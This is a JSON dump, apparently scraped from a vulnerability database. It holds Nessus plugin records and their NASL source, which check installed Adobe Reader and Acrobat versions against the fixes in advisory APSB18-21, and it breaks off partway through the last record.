"CVE-2018-12762", "CVE-2018-12763", "CVE-2018-12764", "CVE-2018-12765", "CVE-2018-12766", "CVE-2018-12767", "CVE-2018-12768", "CVE-2018-12770", "CVE-2018-12771", "CVE-2018-12772", "CVE-2018-12773", "CVE-2018-12774", "CVE-2018-12776", "CVE-2018-12777", "CVE-2018-12779", "CVE-2018-12780", "CVE-2018-12781", "CVE-2018-12782", "CVE-2018-12783", "CVE-2018-12784", "CVE-2018-12785", "CVE-2018-12786", "CVE-2018-12787", "CVE-2018-12788", "CVE-2018-12789", "CVE-2018-12790", "CVE-2018-12791", "CVE-2018-12792", "CVE-2018-12793", "CVE-2018-12794", "CVE-2018-12795", "CVE-2018-12796", "CVE-2018-12797", "CVE-2018-12798", "CVE-2018-12799", "CVE-2018-12802", "CVE-2018-12803", "CVE-2018-5007", "CVE-2018-5008", "CVE-2018-5009", "CVE-2018-5010", "CVE-2018-5011", "CVE-2018-5012", "CVE-2018-5014", "CVE-2018-5015", "CVE-2018-5016", "CVE-2018-5017", "CVE-2018-5018", "CVE-2018-5019", "CVE-2018-5020", "CVE-2018-5021", "CVE-2018-5022", "CVE-2018-5023", "CVE-2018-5024", "CVE-2018-5025", "CVE-2018-5026", "CVE-2018-5027", "CVE-2018-5028", "CVE-2018-5029", "CVE-2018-5030", "CVE-2018-5031", "CVE-2018-5032", "CVE-2018-5033", "CVE-2018-5034", "CVE-2018-5035", "CVE-2018-5036", "CVE-2018-5037", "CVE-2018-5038", "CVE-2018-5039", "CVE-2018-5040", "CVE-2018-5041", "CVE-2018-5042", "CVE-2018-5043", "CVE-2018-5044", "CVE-2018-5045", "CVE-2018-5046", "CVE-2018-5047", "CVE-2018-5048", "CVE-2018-5049", "CVE-2018-5050", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-5053", "CVE-2018-5054", "CVE-2018-5055", "CVE-2018-5056", "CVE-2018-5057", "CVE-2018-5058", "CVE-2018-5059", "CVE-2018-5060", "CVE-2018-5061", "CVE-2018-5062", "CVE-2018-5063", "CVE-2018-5064", "CVE-2018-5065", "CVE-2018-5066", "CVE-2018-5067", "CVE-2018-5068", "CVE-2018-5069", "CVE-2018-5070"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-07-20T15:24:42", "id": "TRENDMICROBLOG:45477ECD0A0F60BA46719A3A87A0DB53", "href": "https://blog.trendmicro.com/zero-day-coverage-update-week-of-july-16-2018/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-12-10T23:53:34", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html"], "pluginID": "111010", "description": "The version of Adobe Reader installed on the remote macOS or Mac OS X host is a version prior to 15.006.30434, 17.011.30096, or 18.011.20055. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 7, "reporter": "Tenable", "published": "2018-07-12T00:00:00", "title": "Adobe Reader < 15.006.30434 / 17.011.30096 / 18.011.20055 Multiple Vulnerabilities (APSB18-21) (macOS)", "type": "nessus", "enchantments": {"score": {"modified": "2018-12-10T23:53:34", "vector": "NONE", "value": 5.0}}, "naslFamily": "MacOS X Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-12-07T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOSX_ADOBE_READER_APSB18-21.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111010", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111010);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/07 17:08:17\");\n\n script_cve_id(\n \"CVE-2018-5009\",\n \"CVE-2018-5010\",\n \"CVE-2018-5011\",\n \"CVE-2018-5012\",\n \"CVE-2018-5014\",\n \"CVE-2018-5015\",\n \"CVE-2018-5016\",\n \"CVE-2018-5017\",\n \"CVE-2018-5018\",\n \"CVE-2018-5019\",\n \"CVE-2018-5020\",\n \"CVE-2018-5021\",\n \"CVE-2018-5022\",\n \"CVE-2018-5023\",\n \"CVE-2018-5024\",\n \"CVE-2018-5025\",\n \"CVE-2018-5026\",\n \"CVE-2018-5027\",\n \"CVE-2018-5028\",\n \"CVE-2018-5029\",\n \"CVE-2018-5030\",\n \"CVE-2018-5031\",\n \"CVE-2018-5032\",\n \"CVE-2018-5033\",\n \"CVE-2018-5034\",\n \"CVE-2018-5035\",\n \"CVE-2018-5036\",\n \"CVE-2018-5037\",\n \"CVE-2018-5038\",\n \"CVE-2018-5039\",\n \"CVE-2018-5040\",\n \"CVE-2018-5041\",\n \"CVE-2018-5042\",\n \"CVE-2018-5043\",\n \"CVE-2018-5044\",\n \"CVE-2018-5045\",\n \"CVE-2018-5046\",\n \"CVE-2018-5047\",\n \"CVE-2018-5048\",\n \"CVE-2018-5049\",\n \"CVE-2018-5050\",\n \"CVE-2018-5051\",\n \"CVE-2018-5052\",\n \"CVE-2018-5053\",\n \"CVE-2018-5054\",\n \"CVE-2018-5055\",\n \"CVE-2018-5056\",\n \"CVE-2018-5057\",\n \"CVE-2018-5058\",\n \"CVE-2018-5059\",\n \"CVE-2018-5060\",\n \"CVE-2018-5061\",\n \"CVE-2018-5062\",\n \"CVE-2018-5063\",\n \"CVE-2018-5064\",\n \"CVE-2018-5065\",\n \"CVE-2018-5066\",\n \"CVE-2018-5067\",\n \"CVE-2018-5068\",\n \"CVE-2018-5069\",\n \"CVE-2018-5070\",\n \"CVE-2018-12784\",\n \"CVE-2018-12754\",\n \"CVE-2018-12755\",\n \"CVE-2018-12756\",\n \"CVE-2018-12757\",\n \"CVE-2018-12758\",\n \"CVE-2018-12760\",\n \"CVE-2018-12761\",\n \"CVE-2018-12762\",\n \"CVE-2018-12763\",\n \"CVE-2018-12764\",\n \"CVE-2018-12765\",\n \"CVE-2018-12766\",\n \"CVE-2018-12767\",\n \"CVE-2018-12768\",\n \"CVE-2018-12770\",\n \"CVE-2018-12771\",\n \"CVE-2018-12772\",\n \"CVE-2018-12773\",\n \"CVE-2018-12774\",\n \"CVE-2018-12776\",\n \"CVE-2018-12777\",\n \"CVE-2018-12779\",\n \"CVE-2018-12780\",\n \"CVE-2018-12781\",\n \"CVE-2018-12782\",\n \"CVE-2018-12783\",\n \"CVE-2018-12785\",\n \"CVE-2018-12786\",\n \"CVE-2018-12787\",\n \"CVE-2018-12788\",\n \"CVE-2018-12789\",\n \"CVE-2018-12790\",\n \"CVE-2018-12791\",\n \"CVE-2018-12792\",\n \"CVE-2018-12793\",\n \"CVE-2018-12794\",\n \"CVE-2018-12795\",\n \"CVE-2018-12796\",\n \"CVE-2018-12797\",\n \"CVE-2018-12798\",\n \"CVE-2018-12802\",\n \"CVE-2018-12803\"\n );\n script_bugtraq_id(\n 104699,\n 104700,\n 104701,\n 104704\n );\n\n script_name(english:\"Adobe Reader < 15.006.30434 / 17.011.30096 / 18.011.20055 Multiple Vulnerabilities (APSB18-21) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 15.006.30434, 17.011.30096, or\n18.011.20055. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 15.006.30434 / 17.011.30096 / 18.011.20055 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Reader\");\nbase_dir = app_info['path'] - \"/Applications\";\ntrack = get_kb_item(\"MacOSX/Adobe_Reader\"+base_dir+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.011.30096\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.006.30434\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.011.20055\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-14T09:41:12", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html"], "pluginID": "111012", "description": "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2015.006.30418, 2017.011.30080, or 2018.011.20040. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 8, "reporter": "Tenable", "published": "2018-07-12T00:00:00", "title": "Adobe Reader <= 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-21)", "type": "nessus", "enchantments": {"score": {"modified": "2018-12-14T09:41:12", "vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-12-13T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB18-21.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111012);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/13 17:21:46\");\n\n script_cve_id(\n \"CVE-2018-5009\",\n \"CVE-2018-5010\",\n \"CVE-2018-5011\",\n \"CVE-2018-5012\",\n \"CVE-2018-5014\",\n \"CVE-2018-5015\",\n \"CVE-2018-5016\",\n \"CVE-2018-5017\",\n \"CVE-2018-5018\",\n \"CVE-2018-5019\",\n \"CVE-2018-5020\",\n \"CVE-2018-5021\",\n \"CVE-2018-5022\",\n \"CVE-2018-5023\",\n \"CVE-2018-5024\",\n \"CVE-2018-5025\",\n \"CVE-2018-5026\",\n \"CVE-2018-5027\",\n \"CVE-2018-5028\",\n \"CVE-2018-5029\",\n \"CVE-2018-5030\",\n \"CVE-2018-5031\",\n \"CVE-2018-5032\",\n \"CVE-2018-5033\",\n \"CVE-2018-5034\",\n \"CVE-2018-5035\",\n \"CVE-2018-5036\",\n \"CVE-2018-5037\",\n \"CVE-2018-5038\",\n \"CVE-2018-5039\",\n \"CVE-2018-5040\",\n \"CVE-2018-5041\",\n \"CVE-2018-5042\",\n \"CVE-2018-5043\",\n \"CVE-2018-5044\",\n \"CVE-2018-5045\",\n \"CVE-2018-5046\",\n \"CVE-2018-5047\",\n \"CVE-2018-5048\",\n \"CVE-2018-5049\",\n \"CVE-2018-5050\",\n \"CVE-2018-5051\",\n \"CVE-2018-5052\",\n \"CVE-2018-5053\",\n \"CVE-2018-5054\",\n \"CVE-2018-5055\",\n \"CVE-2018-5056\",\n \"CVE-2018-5057\",\n \"CVE-2018-5058\",\n \"CVE-2018-5059\",\n \"CVE-2018-5060\",\n \"CVE-2018-5061\",\n \"CVE-2018-5062\",\n \"CVE-2018-5063\",\n \"CVE-2018-5064\",\n \"CVE-2018-5065\",\n \"CVE-2018-5066\",\n \"CVE-2018-5067\",\n \"CVE-2018-5068\",\n \"CVE-2018-5069\",\n \"CVE-2018-5070\",\n \"CVE-2018-12784\",\n \"CVE-2018-12754\",\n \"CVE-2018-12755\",\n \"CVE-2018-12756\",\n \"CVE-2018-12757\",\n \"CVE-2018-12758\",\n \"CVE-2018-12760\",\n \"CVE-2018-12761\",\n \"CVE-2018-12762\",\n \"CVE-2018-12763\",\n \"CVE-2018-12764\",\n \"CVE-2018-12765\",\n \"CVE-2018-12766\",\n \"CVE-2018-12767\",\n \"CVE-2018-12768\",\n \"CVE-2018-12770\",\n \"CVE-2018-12771\",\n \"CVE-2018-12772\",\n \"CVE-2018-12773\",\n \"CVE-2018-12774\",\n \"CVE-2018-12776\",\n \"CVE-2018-12777\",\n \"CVE-2018-12779\",\n \"CVE-2018-12780\",\n \"CVE-2018-12781\",\n \"CVE-2018-12782\",\n \"CVE-2018-12783\",\n \"CVE-2018-12785\",\n \"CVE-2018-12786\",\n \"CVE-2018-12787\",\n \"CVE-2018-12788\",\n \"CVE-2018-12789\",\n \"CVE-2018-12790\",\n \"CVE-2018-12791\",\n \"CVE-2018-12792\",\n \"CVE-2018-12793\",\n \"CVE-2018-12794\",\n \"CVE-2018-12795\",\n \"CVE-2018-12796\",\n \"CVE-2018-12797\",\n \"CVE-2018-12798\",\n \"CVE-2018-12802\",\n \"CVE-2018-12803\"\n );\n script_bugtraq_id(\n 104699,\n 104700,\n 104701,\n 104704\n );\n\n script_name(english:\"Adobe Reader <= 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-21)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30418, 2017.011.30080, or\n2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30434 / 2017.011.30096\n/ 2018.011.20055 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::adobe_reader::get_app_info();\ntrack = get_kb_item(\"SMB/Acroread/\"+app_info['version']+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30080\", \"fixed_version\" : \"17.11.30096\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30418\", \"fixed_version\" : \"15.6.30434\" },\n { \"min_version\" : \"18.8\", \"max_version\" : \"18.11.20040\", \"fixed_version\" : \"18.11.20055\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-14T09:43:50", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html"], "pluginID": "111011", "description": "The version of Adobe Acrobat installed on the remote Windows host is a version prior to 15.006.30434, 17.011.30096, or 18.011.20055. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 7, "reporter": "Tenable", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat < 15.006.30434 / 17.011.30096 / 18.011.20055 Multiple Vulnerabilities (APSB18-21)", "type": "nessus", "enchantments": {"score": {"modified": "2018-12-14T09:43:50", "vector": "NONE", "value": 5.0}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-12-13T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB18-21.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111011", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111011);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/12/13 17:21:46\");\n\n script_cve_id(\n \"CVE-2018-5009\",\n \"CVE-2018-5010\",\n \"CVE-2018-5011\",\n \"CVE-2018-5012\",\n \"CVE-2018-5014\",\n \"CVE-2018-5015\",\n \"CVE-2018-5016\",\n \"CVE-2018-5017\",\n \"CVE-2018-5018\",\n \"CVE-2018-5019\",\n \"CVE-2018-5020\",\n \"CVE-2018-5021\",\n \"CVE-2018-5022\",\n \"CVE-2018-5023\",\n \"CVE-2018-5024\",\n \"CVE-2018-5025\",\n \"CVE-2018-5026\",\n \"CVE-2018-5027\",\n \"CVE-2018-5028\",\n \"CVE-2018-5029\",\n \"CVE-2018-5030\",\n \"CVE-2018-5031\",\n \"CVE-2018-5032\",\n \"CVE-2018-5033\",\n \"CVE-2018-5034\",\n \"CVE-2018-5035\",\n \"CVE-2018-5036\",\n \"CVE-2018-5037\",\n \"CVE-2018-5038\",\n \"CVE-2018-5039\",\n \"CVE-2018-5040\",\n \"CVE-2018-5041\",\n \"CVE-2018-5042\",\n \"CVE-2018-5043\",\n \"CVE-2018-5044\",\n \"CVE-2018-5045\",\n \"CVE-2018-5046\",\n \"CVE-2018-5047\",\n \"CVE-2018-5048\",\n \"CVE-2018-5049\",\n \"CVE-2018-5050\",\n \"CVE-2018-5051\",\n \"CVE-2018-5052\",\n \"CVE-2018-5053\",\n \"CVE-2018-5054\",\n \"CVE-2018-5055\",\n \"CVE-2018-5056\",\n \"CVE-2018-5057\",\n \"CVE-2018-5058\",\n \"CVE-2018-5059\",\n \"CVE-2018-5060\",\n \"CVE-2018-5061\",\n \"CVE-2018-5062\",\n \"CVE-2018-5063\",\n \"CVE-2018-5064\",\n \"CVE-2018-5065\",\n \"CVE-2018-5066\",\n \"CVE-2018-5067\",\n \"CVE-2018-5068\",\n \"CVE-2018-5069\",\n \"CVE-2018-5070\",\n \"CVE-2018-12784\",\n \"CVE-2018-12754\",\n \"CVE-2018-12755\",\n \"CVE-2018-12756\",\n \"CVE-2018-12757\",\n \"CVE-2018-12758\",\n \"CVE-2018-12760\",\n \"CVE-2018-12761\",\n \"CVE-2018-12762\",\n \"CVE-2018-12763\",\n \"CVE-2018-12764\",\n \"CVE-2018-12765\",\n \"CVE-2018-12766\",\n \"CVE-2018-12767\",\n \"CVE-2018-12768\",\n \"CVE-2018-12770\",\n \"CVE-2018-12771\",\n \"CVE-2018-12772\",\n \"CVE-2018-12773\",\n \"CVE-2018-12774\",\n \"CVE-2018-12776\",\n \"CVE-2018-12777\",\n \"CVE-2018-12779\",\n \"CVE-2018-12780\",\n \"CVE-2018-12781\",\n \"CVE-2018-12782\",\n \"CVE-2018-12783\",\n \"CVE-2018-12785\",\n \"CVE-2018-12786\",\n \"CVE-2018-12787\",\n \"CVE-2018-12788\",\n \"CVE-2018-12789\",\n \"CVE-2018-12790\",\n \"CVE-2018-12791\",\n \"CVE-2018-12792\",\n \"CVE-2018-12793\",\n \"CVE-2018-12794\",\n \"CVE-2018-12795\",\n \"CVE-2018-12796\",\n \"CVE-2018-12797\",\n \"CVE-2018-12798\",\n \"CVE-2018-12802\",\n \"CVE-2018-12803\"\n );\n script_bugtraq_id(\n 104699,\n 104700,\n 104701,\n 104704\n );\n\n script_name(english:\"Adobe Acrobat < 15.006.30434 / 17.011.30096 / 18.011.20055 Multiple Vulnerabilities (APSB18-21)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 15.006.30434, 17.011.30096, or 18.011.20055. It is,\ntherefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 15.006.30434 / 17.011.30096 / 18.011.20055 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 